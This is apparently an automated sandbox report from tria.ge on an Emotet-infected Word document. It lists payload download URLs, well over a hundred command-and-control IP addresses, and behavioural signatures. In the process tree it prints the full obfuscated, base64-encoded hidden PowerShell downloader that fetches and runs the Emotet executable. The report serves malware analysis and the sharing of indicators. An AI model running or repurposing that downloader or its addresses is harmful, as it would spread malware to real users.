Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
27s -
resource
win10v191014 -
submitted
24/01/2020, 08:50
General
Malware Config
Extracted
http://taichungchurch.com/calendar/con-9xr-04992723/
http://test.nouraalmutairi.com/alfacgiapi/xa343f1lp-psspqrq-5769/
http://sunshinewebsite.club/delcot/itqi-jettzdorn-7561/
http://skyhimalayantours.com/nff/eynh46ml83-yebbh-72469/
http://tecnobau.cl/wp-includes/omFJFdefZ/
Extracted
emotet
72.176.87.136:80
150.246.246.238:80
202.229.211.95:80
178.33.167.120:8080
144.76.56.36:8080
176.58.93.123:80
51.38.134.203:8080
185.207.57.205:443
192.241.220.183:8080
24.141.12.228:80
82.79.244.92:80
186.223.86.136:443
154.73.137.131:80
98.15.140.226:80
177.103.240.93:80
142.93.87.198:8080
158.69.167.246:8080
203.124.57.50:80
91.83.93.103:443
157.7.164.178:8081
182.176.116.139:995
78.189.165.52:8080
59.135.126.129:443
177.144.130.105:443
37.211.67.229:80
185.192.75.240:443
46.17.6.116:8080
75.86.6.174:80
1.217.126.11:443
85.100.122.211:80
69.30.205.162:7080
50.116.78.109:8080
95.216.207.86:7080
160.226.171.255:443
72.27.212.209:8080
192.241.241.221:443
181.39.96.86:443
156.155.163.232:80
190.5.162.204:80
95.9.217.200:8080
69.14.208.221:80
58.185.224.18:80
78.46.87.133:8080
88.247.26.78:80
201.183.251.100:80
98.192.74.164:80
41.77.74.214:443
51.77.113.97:8080
95.130.37.244:443
212.129.14.27:8080
78.188.170.128:80
110.142.161.90:80
42.51.192.231:8080
192.210.217.94:8080
185.244.167.25:443
188.251.213.180:443
163.172.107.70:8080
60.130.173.117:80
216.75.37.196:8080
160.119.153.20:80
88.225.230.33:80
89.215.225.15:80
70.45.30.28:80
144.139.91.187:80
82.145.43.153:8080
125.209.114.180:443
46.32.229.152:8080
82.146.55.23:7080
81.214.253.80:443
162.144.46.90:8080
196.6.119.137:80
60.152.212.149:80
76.11.76.47:80
187.72.47.161:443
58.92.179.55:443
78.210.132.35:80
190.63.7.166:8080
91.117.31.181:80
182.74.249.74:80
78.186.102.195:80
122.176.116.57:443
187.177.155.123:990
24.70.40.15:8080
88.247.53.159:443
91.117.131.122:80
210.111.160.220:80
181.196.27.123:80
186.147.245.204:80
190.93.210.113:80
153.137.36.142:80
81.214.142.115:80
197.94.32.129:8080
85.109.190.235:443
81.82.247.216:80
5.196.200.208:8080
99.229.254.209:80
61.221.152.140:80
105.209.235.113:8080
211.229.116.130:80
75.127.14.170:8080
183.87.40.21:8080
88.248.140.80:80
112.186.195.176:80
23.253.207.142:8080
180.16.248.25:80
41.185.29.128:8080
122.116.104.238:7080
37.70.131.107:80
149.202.153.251:8080
179.5.118.12:8080
212.112.113.235:80
183.82.123.60:443
139.59.12.63:8080
14.161.30.33:443
98.178.241.106:80
195.201.56.70:8080
190.171.153.139:80
180.33.71.88:80
1.221.254.82:80
50.63.13.135:8080
220.247.70.174:80
153.183.25.24:80
183.91.3.63:80
172.104.70.207:8080
175.127.140.68:80
175.181.7.188:80
78.189.60.109:443
Signatures
-
Suspicious behavior: EmotetMutantsSpam 1 IoCs
pid Process 3912 269.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 4968 WINWORD.EXE 4704 269.exe 3912 269.exe -
Process spawned unexpected child process 1 IoCs
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4572 5032 Powershell.exe 73 -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 4572 Powershell.exe -
Executes dropped EXE 2 IoCs
pid Process 4704 269.exe 3912 269.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 4968 WINWORD.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4572 Powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4572 wrote to memory of 4704 4572 Powershell.exe 80 PID 4704 wrote to memory of 3912 4704 269.exe 81 -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\11584b0cfff6964153002e14fef4c0c814249d36b51fe022a06235a77a5b4bc4.doc" /o ""1⤵
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
PID:4968
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABGAHoAZgBqAG4AbAB4AGYAagBkAGgAagA9ACcAWgB6AG0AZwBsAHYAZgBxAGwAYwBmAGYAJwA7ACQAQwByAGMAcQBpAGQAdgBxAHIAYwAgAD0AIAAnADIANgA5ACcAOwAkAFQAeABlAGMAdgBiAGwAbAB3AHoAZwBoAGUAPQAnAEoAdABxAG4AZQB2AGQAbABxAGcAbwBvAG4AJwA7ACQARQBxAGgAbAByAGYAbgByAGYAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMAcgBjAHEAaQBkAHYAcQByAGMAKwAnAC4AZQB4AGUAJwA7ACQASABlAHEAZgBxAGYAYwBoAD0AJwBOAG4AcQBnAGYAbwBiAHIAbQB0AGwAbwAnADsAJABMAGUAZABqAGYAbgB6AHEAagBhAD0AJgAoACcAbgBlAHcALQBvAGIAJwArACcAagAnACsAJwBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAFcAZQBiAEMATABJAGUAbgBUADsAJABTAHMAbwBvAHAAYwBrAHIAPQAnAGgAdAB0AHAAOgAvAC8AdABhAGkAYwBoAHUAbgBnAGMAaAB1AHIAYwBoAC4AYwBvAG0ALwBjAGEAbABlAG4AZABhAHIALwBjAG8AbgAtADkAeAByAC0AMAA0ADkAOQAyADcAMgAzAC8AKgBoAHQAdABwADoALwAvAHQAZQBzAHQALgBuAG8AdQByAGEAYQBsAG0AdQB0AGEAaQByAGkALgBjAG8AbQAvAGEAbABmAGEAYwBnAGkAYQBwAGkALwB4AGEAMwA0ADMAZgAxAGwAcAAtAHAAcwBzAHAAcQByAHEALQA1ADcANgA5AC8AKgBoAHQAdABwADoALwAvAHMAdQBuAHMAaABpAG4AZQB3AGUAYgBzAGkAdABlAC4AYwBsAHUAYgAvAGQAZQBsAGMAbwB0AC8AaQB0AHEAaQAtAGoAZQB0AHQAegBkAG8AcgBuAC0ANwA1ADYAMQAvACoAaAB0AHQAcAA6AC8ALwBzAGsAeQBoAGkAbQBhAGwAYQB5AGEAbgB0AG8AdQByAHMALgBjAG8AbQAvAG4AZgBmAC8AZQB5AG4AaAA0ADYAbQBsADgAMwAtAHkAZQBiAGIAaAAtADcAMgA0ADYAOQAvACoAaAB0AHQAcAA6AC8ALwB0AGUAYwBuAG8AYgBhAHUALgBjAGwALwB3AHAALQBpAG4AYwBsAHUAZABlAHMALwBvAG0ARgBKAEYAZABlAGYAWgAvACcALgAiAFMAUABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQARABxAG0AbwB2AGgAbgB5AD0AJwBSAGIAcQB6AGkAdABnAGwAbgB0AHEAaQAnADsAZgBvAHIAZQBhAGMAaAAoACQAQwBhAHAAegBvAHQAaAB3AHAAawB2AGoAIABpAG4AIAAkAFMAcwBvAG8AcABjAGsAcgApAHsAdAByAHkAewAkAEwAZQBkAGoAZgBuAHoAcQBqAGEALgAiAGQAbwB3AGAATgBgAEwATwBBAEQAZgBpAGwAZQAiACgAJABDAGEAcAB6AG8AdABoAHcAcABrAHYAagAsACAAJABFAHEAaABsAHIAZgBuAHIAZgApADsAJABMAHIAbgB4AGIAagBzAHQAawA9ACcAQQBzAG8AbAB3AGcAcABmACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQBJAHQAJwArACcAZQBtACcAKQAgACQARQBxAGgAbAByAGYAbgByAGYAKQAuACIAbABFAGAATgBHAFQAaAAiACAALQBnAGUAIAAzADgAMAA4ADAAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAcwBUAEEAYABSAHQAIgAoACQARQBxAGgAbAByAGYAbgByAGYAKQA7ACQAWQBjAGkAcwBuAGEAYgB6AD0AJwBDAGgAYwBkAHQAcQB3AHoAYQB5AHIAYwAnADsAYgByAGUAYQBrADsAJABBAHIAegBxAG4AYgBkAHAAcAA9ACcATABvAGoAdwBzAHIAawBjAGcAeABsAG0AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAUQBzAGYAeABxAGwAdwBlAD0AJwBWAGEAawBtAGoAcwBuAHMAdQBrAGkAYgAnAA==1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\269.exe"C:\Users\Admin\269.exe"2⤵
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4704 -
C:\Users\Admin\269.exe--ad15cb133⤵
- Suspicious behavior: EmotetMutantsSpam
- Suspicious use of SetWindowsHookEx
- Executes dropped EXE
PID:3912
-
-